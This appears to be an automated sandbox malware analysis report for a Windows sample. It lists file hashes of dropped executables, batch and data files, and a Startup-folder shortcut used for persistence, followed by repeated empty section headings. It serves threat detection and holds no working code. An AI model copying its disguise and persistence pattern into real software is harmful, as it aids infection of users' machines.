Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.js	ASCII text, with no line terminators	BFDBD4EE5EB9C2BDFA1F82BDFBC7BD5E	54C5BB227D5D70B78F24070733240AE4BFCCB4C3	A083D0F2ACB982E82B982304EB96F97C8AFD3C9762A57F1835ABBA1A50D06DF3
C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	PE32 executable (GUI) Intel 80386, for MS Windows	18CE19B57F43CE0A5AF149C96AECC685	1BD5CA29FC35FC8AC346F23B155337C5B28BBC36	D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\O	data	D61BFD64FBF003BA89A0038E38339DF6	EF8F3EA9AA749EA516E2D62AE586680C4E14D4E5	3133DFE772AFBE5FFD178038BEE3FF413665EC29A5565881D63BBB5370C58AF2
C:\Users\user\AppData\Local\Temp\103495\Powder.pif	PE32 executable (GUI) Intel 80386, for MS Windows	18CE19B57F43CE0A5AF149C96AECC685	1BD5CA29FC35FC8AC346F23B155337C5B28BBC36	D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
C:\Users\user\AppData\Local\Temp\103495\n	data	D61BFD64FBF003BA89A0038E38339DF6	EF8F3EA9AA749EA516E2D62AE586680C4E14D4E5	3133DFE772AFBE5FFD178038BEE3FF413665EC29A5565881D63BBB5370C58AF2
C:\Users\user\AppData\Local\Temp\Appraisal	data	768DB4AC22081145374C24722FCC43AD	BDB3807C1202E377300C0BA5C3583A698C37ADFD	344B4C601FD07DF63377194621D87533A3AFA29FF6F56190C4F64B5D9FAB5B08
C:\Users\user\AppData\Local\Temp\Barbie	data	001014C69A9062B0753718619B7E71E3	5EE78AB9158525C3F2342707C29FBC8C50DC8426	29A6F67DE3F128B72F48CD17714C88EC0EF28771A242A4C6924087807D0F1182
C:\Users\user\AppData\Local\Temp\Centres	ASCII text, with very long lines (1199), with CRLF line terminators	DE5800B2AD98E412AFE2A7BC93DFA639	E3D423C60E01C7C079261521B0939DA80A85649A	67D35DB2809DA95D2DC7E4CE76800103CBC042E2F02D1CC1934A6C06E5E6737C
C:\Users\user\AppData\Local\Temp\Centres.bat (copy)	ASCII text, with very long lines (1199), with CRLF line terminators	DE5800B2AD98E412AFE2A7BC93DFA639	E3D423C60E01C7C079261521B0939DA80A85649A	67D35DB2809DA95D2DC7E4CE76800103CBC042E2F02D1CC1934A6C06E5E6737C
C:\Users\user\AppData\Local\Temp\Correct	data	D91B8B96745F7B7D81179268D4DA4B4D	B4AD21AFB4044B0C1461E1C5523D792110FB6130	8704CB6EBE7EEF39F91CA6838C2D06EB9B21ED6E6DFDDC5F5707B8CB4A9F64F1
C:\Users\user\AppData\Local\Temp\Fine	data	5A3868FBE5A6517157D7A0337C938E0A	4E8E6C526393D3D679C93D2A57B0DCA2EC0427FC	75CB47C2BB9BEDEDD276C0008683B7E655A9E943626D2755BFA7D7E167F2B31B
C:\Users\user\AppData\Local\Temp\Gloves	data	383CECC8DE45B96CEFDF4CE6DDBAE343	8A12728453735E74E0D633B28BDF4556D4B0AF41	A47C770A23612063F299F22871E18642B3D4668FB58765CDC279C4C0C3A23321
C:\Users\user\AppData\Local\Temp\Latin	data	AC72A864D71E31270399396CEFA534E7	C41004BCFB507028F7D109EA2CBAB9A8BA5F4BD9	F83C95DD15E4EB1B7F68946ECB8F1A689CC16CEBE02AE68EBC4E08E7AB467296
C:\Users\user\AppData\Local\Temp\Serious	data	194A567844C46F20EABDCF8A7BF469DD	CCC915EEAEBEA7AD2C5550A3BA1C917B3708C469	C2E3ADF32419B4163876794FCE4ED1F2C5D631A13AAAA955F3D3E30F1EB66A13
C:\Users\user\AppData\Local\Temp\Ski	data	08342A0886A607763230CC9E7F9763E9	EDBEA1401B8653FED918C0E6ADBAF9E6271BEC52	F7AD68CE94DF8B242FC3F6E9BD7814A16011214952805ED5E8E6ADEF74A27F48
C:\Users\user\AppData\Local\Temp\Story	data	99E977093BC7AB3360CBC1146D0EE20C	AD950626C995AF3BBE62E9AC187FA7CABDA406AD	C1551D0D3D6C658C1B55558C4FDB2B1BE9233715B63485997C935C434BD570E7
C:\Users\user\AppData\Local\Temp\Transparent	data	0B034950E941768616AF2EBA4F9D4000	A50F20A10E8DF21A1B2C1655F9F300C31D2EBED3	D9AEA2AAD680EFCD111B992B6124E72F6BA2FEB178867D1C5F5167A21423BD4E
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardianCryptoElite.url	MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.js" >), ASCII text, with CRLF line terminators	523F0DBCAD516F67D396002AF1572F4A	A31D56453A86034B7D7323D618D8EB0FF62B0825	2F470B896FF84C06F3ACBD00BE6CE3BD55BCB91AB8671841A01DC21CE6997647

Windows Analysis Report
cW5i0RdQ4L.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report cW5i0RdQ4L.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
cW5i0RdQ4L.exe